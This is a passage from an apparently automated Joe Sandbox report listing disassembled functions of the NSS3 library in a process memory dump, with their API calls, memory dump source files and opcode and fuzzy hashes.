                                                                          • Part of subcall function 6CB83310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6CB82D1E,?,?,?,?,00000000,?,?,?,?,?,6CB81289), ref: 6CB83348
                                                                          • Part of subcall function 6CB806F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6CB82E70,00000000), ref: 6CB80701
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
                                                                        • String ID:
                                                                        • API String ID: 2288138528-0
                                                                        • Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
                                                                        • Instruction ID: 927ddc3039dee63bef7fedeb97c645c66c26fbb6b03234021dcb923e808259b7
                                                                        • Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
                                                                        • Instruction Fuzzy Hash: 78310CB2902291ABDB009E64EC41AAE3B65FF4531DF140130FD145B791E731E928C7A3
                                                                        Function 6CB16C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB16C8D
                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CB16CA9
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CB16CC0
                                                                        • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CC38FE0), ref: 6CB16CFE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                        • String ID:
                                                                        • API String ID: 2370200771-0
                                                                        • Opcode ID: 80e0bd162d38eb6d425a3a81e3b62bee3db0806b9a93654581419378d929e9fd
                                                                        • Instruction ID: 9cea655804603ac9e77d77def9fe26b3f38fcd5114dc1ab42cd678c990dd1f56
                                                                        • Opcode Fuzzy Hash: 80e0bd162d38eb6d425a3a81e3b62bee3db0806b9a93654581419378d929e9fd
                                                                        • Instruction Fuzzy Hash: 58318FB1A042569FEB08CF65C891ABFBBF9EF49248B14443DD905E7B40EB319905CBA1
                                                                        Function 6CB86DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_MillisecondsToInterval.NSS3(?), ref: 6CB86E36
                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB86E57
                                                                          • Part of subcall function 6CBBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBBC2BF
                                                                        • PR_MillisecondsToInterval.NSS3(?), ref: 6CB86E7D
                                                                        • PR_MillisecondsToInterval.NSS3(?), ref: 6CB86EAA
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: IntervalMilliseconds$ErrorValue
                                                                        • String ID:
                                                                        • API String ID: 3163584228-0
                                                                        • Opcode ID: 1bcf8638901af19620574cbcc30e5d22d5b441acf2ed7bb614bb530d5441d905
                                                                        • Instruction ID: 39d7df968538a563cae1ab2a159d1fc8b44714032e8810eef80b01280be83ddd
                                                                        • Opcode Fuzzy Hash: 1bcf8638901af19620574cbcc30e5d22d5b441acf2ed7bb614bb530d5441d905
                                                                        • Instruction Fuzzy Hash: 5231A531632596EFDB145F34DD043A6B7A4EB1131BF10063CD499D6A40EB31B554CFA2
                                                                        Function 6CB6DDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6CB6DDB1,?,00000000), ref: 6CB6DDF4
                                                                          • Part of subcall function 6CB714C0: TlsGetValue.KERNEL32 ref: 6CB714E0
                                                                          • Part of subcall function 6CB714C0: EnterCriticalSection.KERNEL32 ref: 6CB714F5
                                                                          • Part of subcall function 6CB714C0: PR_Unlock.NSS3 ref: 6CB7150D
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6CB6DDB1,?,00000000), ref: 6CB6DE0B
                                                                        • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6CB6DDB1,?,00000000), ref: 6CB6DE17
                                                                          • Part of subcall function 6CB70BE0: malloc.MOZGLUE(6CB68D2D,?,00000000,?), ref: 6CB70BF8
                                                                          • Part of subcall function 6CB70BE0: TlsGetValue.KERNEL32(6CB68D2D,?,00000000,?), ref: 6CB70C15
                                                                        • PR_SetError.NSS3(FFFFE009,00000000), ref: 6CB6DE80
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                        • String ID:
                                                                        • API String ID: 3725328900-0
                                                                        • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                        • Instruction ID: c7ab0327ae5a851d4f0801540a08ae7f3f811ce7eb1395d729d54b6b3de0c3c3
                                                                        • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                        • Instruction Fuzzy Hash: 6731C7B19017829BEB10CF67E880656B7A4FFA5318B24822AD81D87F01E771E5A4CF91
                                                                        Function 6CB82DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PORT_ArenaMark_Util.NSS3(?), ref: 6CB82E08
                                                                          • Part of subcall function 6CB714C0: TlsGetValue.KERNEL32 ref: 6CB714E0
                                                                          • Part of subcall function 6CB714C0: EnterCriticalSection.KERNEL32 ref: 6CB714F5
                                                                          • Part of subcall function 6CB714C0: PR_Unlock.NSS3 ref: 6CB7150D
                                                                        • PORT_NewArena_Util.NSS3(00000400), ref: 6CB82E1C
                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CB82E3B
                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB82E95
                                                                          • Part of subcall function 6CB71200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CB188A4,00000000,00000000), ref: 6CB71228
                                                                          • Part of subcall function 6CB71200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CB71238
                                                                          • Part of subcall function 6CB71200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CB188A4,00000000,00000000), ref: 6CB7124B
                                                                          • Part of subcall function 6CB71200: PR_CallOnce.NSS3(6CC72AA4,6CB712D0,00000000,00000000,00000000,?,6CB188A4,00000000,00000000), ref: 6CB7125D
                                                                          • Part of subcall function 6CB71200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CB7126F
                                                                          • Part of subcall function 6CB71200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CB71280
                                                                          • Part of subcall function 6CB71200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CB7128E
                                                                          • Part of subcall function 6CB71200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CB7129A
                                                                          • Part of subcall function 6CB71200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CB712A1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                        • String ID:
                                                                        • API String ID: 1441289343-0
                                                                        • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                        • Instruction ID: f2e96e312fb57beeb7581bd4bf92655f6b8c58b4f49c029674e33c5fc8e758fe
                                                                        • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                        • Instruction Fuzzy Hash: 402104B1D023C14BEB10CF149D48BAA3764AFA130DF150269DD186B742F7B1E69883B7
                                                                        Function 6CB3ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CERT_NewCertList.NSS3 ref: 6CB3ACC2
                                                                          • Part of subcall function 6CB12F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CB12F0A
                                                                          • Part of subcall function 6CB12F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB12F1D
                                                                          • Part of subcall function 6CB12AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CB10A1B,00000000), ref: 6CB12AF0
                                                                          • Part of subcall function 6CB12AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB12B11
                                                                        • CERT_DestroyCertList.NSS3(00000000), ref: 6CB3AD5E
                                                                          • Part of subcall function 6CB557D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CB1B41E,00000000,00000000,?,00000000,?,6CB1B41E,00000000,00000000,00000001,?), ref: 6CB557E0
                                                                          • Part of subcall function 6CB557D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CB55843
                                                                        • CERT_DestroyCertList.NSS3(?), ref: 6CB3AD36
                                                                          • Part of subcall function 6CB12F50: CERT_DestroyCertificate.NSS3(?), ref: 6CB12F65
                                                                          • Part of subcall function 6CB12F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB12F83
                                                                        • free.MOZGLUE(?), ref: 6CB3AD4F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                        • String ID:
                                                                        • API String ID: 132756963-0
                                                                        • Opcode ID: eb3a3476acb9bbce091ba1ed97a8bbb89e32cdb3178b660be331d892e10ce5fe
                                                                        • Instruction ID: 0a425e3e7ee2f4ca36c4c21de81ef22912e821a9e01f883385addbf4631bf944
                                                                        • Opcode Fuzzy Hash: eb3a3476acb9bbce091ba1ed97a8bbb89e32cdb3178b660be331d892e10ce5fe
                                                                        • Instruction Fuzzy Hash: F02127B1D002649BEF01DFA4D8055EEB7B4EF06208F555028D808BBB00FB31AA59CFE2
                                                                        Function 6CB63C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32 ref: 6CB63C9E
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CB63CAE
                                                                        • PR_Unlock.NSS3(?), ref: 6CB63CEA
                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6CB63D02
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalEnterErrorSectionUnlockValue
                                                                        • String ID:
                                                                        • API String ID: 284873373-0
                                                                        • Opcode ID: 5c8711e8441a7a56cfd87a8fef4546466b40ad695e20cae5a4099ee3234a86c1
                                                                        • Instruction ID: 7388861f7d3d71e2441e91b27e10a368ab859d711974ebbc90449ad85d7ed272
                                                                        • Opcode Fuzzy Hash: 5c8711e8441a7a56cfd87a8fef4546466b40ad695e20cae5a4099ee3234a86c1
                                                                        • Instruction Fuzzy Hash: 7511D379A00254AFDB00EF25DC48A9A3B78EF49368F154064FC089BB12E731ED44CBE1
                                                                        Function 6CB6ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CB6F0AD,6CB6F150,?,6CB6F150,?,?,?), ref: 6CB6ECBA
                                                                          • Part of subcall function 6CB70FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB187ED,00000800,6CB0EF74,00000000), ref: 6CB71000
                                                                          • Part of subcall function 6CB70FF0: PR_NewLock.NSS3(?,00000800,6CB0EF74,00000000), ref: 6CB71016
                                                                          • Part of subcall function 6CB70FF0: PL_InitArenaPool.NSS3(00000000,security,6CB187ED,00000008,?,00000800,6CB0EF74,00000000), ref: 6CB7102B
                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CB6ECD1
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB710F3
                                                                          • Part of subcall function 6CB710C0: EnterCriticalSection.KERNEL32(?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7110C
                                                                          • Part of subcall function 6CB710C0: PL_ArenaAllocate.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71141
                                                                          • Part of subcall function 6CB710C0: PR_Unlock.NSS3(?,?,?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB71182
                                                                          • Part of subcall function 6CB710C0: TlsGetValue.KERNEL32(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7119C
                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CB6ED02
                                                                          • Part of subcall function 6CB710C0: PL_ArenaAllocate.NSS3(?,6CB18802,00000000,00000008,?,6CB0EF74,00000000), ref: 6CB7116E
                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CB6ED5A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                        • String ID:
                                                                        • API String ID: 2957673229-0
                                                                        • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                        • Instruction ID: 7d7cc3ffbfe14dac6d72f7de4bcc204e5f8e28f61ee8282edcc5acf92d3eb787
                                                                        • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                        • Instruction Fuzzy Hash: 552180B19007D29BE7008F26DD44B5AB7A4FFA4248F15C226E81C87A61EB70E594C7E1
                                                                        Function 6CB9EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CB87FFA,?,6CB89767,?,8B7874C0,0000A48E), ref: 6CB9EDD4
                                                                        • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CB87FFA,?,6CB89767,?,8B7874C0,0000A48E), ref: 6CB9EDFD
                                                                        • PORT_Alloc_Util.NSS3(?,00000000,00000000,6CB87FFA,?,6CB89767,?,8B7874C0,0000A48E), ref: 6CB9EE14
                                                                          • Part of subcall function 6CB70BE0: malloc.MOZGLUE(6CB68D2D,?,00000000,?), ref: 6CB70BF8
                                                                          • Part of subcall function 6CB70BE0: TlsGetValue.KERNEL32(6CB68D2D,?,00000000,?), ref: 6CB70C15
                                                                        • memcpy.VCRUNTIME140(?,?,6CB89767,00000000,00000000,6CB87FFA,?,6CB89767,?,8B7874C0,0000A48E), ref: 6CB9EE33
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                        • String ID:
                                                                        • API String ID: 3903481028-0
                                                                        • Opcode ID: 4bb8f86ff576e131864a1c60b5c723e4e9e28197cda1548fa0abfff78caad7b1
                                                                        • Instruction ID: ed189dcd111ecb94673f8b2006b44e89dd96ebfa19cb61d67ea1e32496c16134
                                                                        • Opcode Fuzzy Hash: 4bb8f86ff576e131864a1c60b5c723e4e9e28197cda1548fa0abfff78caad7b1
                                                                        • Instruction Fuzzy Hash: B611A0B1A00B96ABEB509E65DC84B0AB3A8FF0535DF204535E91992A00E331F864C7E2
                                                                        Function 6CB38DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalEnterErrorSectionUnlockValue
                                                                        • String ID:
                                                                        • API String ID: 284873373-0
                                                                        • Opcode ID: 1f92f92fc165f47ac08388a37378ef9cb16be5b04a1253ce75f38b816b78697c
                                                                        • Instruction ID: c79b5e078d2d4578ffc8d0b6cadb5fd058d26eaebff3c6af7e137b37f43eee01
                                                                        • Opcode Fuzzy Hash: 1f92f92fc165f47ac08388a37378ef9cb16be5b04a1253ce75f38b816b78697c
                                                                        • Instruction Fuzzy Hash: 55118C71A05A609FD700AF78D5881AABBF4FF45314F01496ADC88D7B00EB34E894CBD2
                                                                        Function 6CBBAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CBA5F17,?,?,?,?,?,?,?,?,6CBAAAD4), ref: 6CBBAC94
                                                                        • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CBA5F17,?,?,?,?,?,?,?,?,6CBAAAD4), ref: 6CBBACA6
                                                                        • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CBAAAD4), ref: 6CBBACC0
                                                                        • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CBAAAD4), ref: 6CBBACDB
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: free$DestroyFreeK11_Monitor
                                                                        • String ID:
                                                                        • API String ID: 3989322779-0
                                                                        • Opcode ID: e1b2322f26aee2b984b8794c68ce3070b0fd63d25b1bc09b237b0e2b9f10b10a
                                                                        • Instruction ID: cce6b91b4650b62b755f335bcba487f69c4c6ab5499e822c3785d03b9e620448
                                                                        • Opcode Fuzzy Hash: e1b2322f26aee2b984b8794c68ce3070b0fd63d25b1bc09b237b0e2b9f10b10a
                                                                        • Instruction Fuzzy Hash: BC014CB1A01B919BEB50DF2AD908767B7E8FF00659B104839D85AE3A00EB31F054CB91
                                                                        Function 6CB21DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CERT_DestroyCertificate.NSS3(?), ref: 6CB21DFB
                                                                          • Part of subcall function 6CB195B0: TlsGetValue.KERNEL32(00000000,?,6CB300D2,00000000), ref: 6CB195D2
                                                                          • Part of subcall function 6CB195B0: EnterCriticalSection.KERNEL32(?,?,?,6CB300D2,00000000), ref: 6CB195E7
                                                                          • Part of subcall function 6CB195B0: PR_Unlock.NSS3(?,?,?,?,6CB300D2,00000000), ref: 6CB19605
                                                                        • PR_EnterMonitor.NSS3 ref: 6CB21E09
                                                                          • Part of subcall function 6CBD9090: TlsGetValue.KERNEL32 ref: 6CBD90AB
                                                                          • Part of subcall function 6CBD9090: TlsGetValue.KERNEL32 ref: 6CBD90C9
                                                                          • Part of subcall function 6CBD9090: EnterCriticalSection.KERNEL32 ref: 6CBD90E5
                                                                          • Part of subcall function 6CBD9090: TlsGetValue.KERNEL32 ref: 6CBD9116
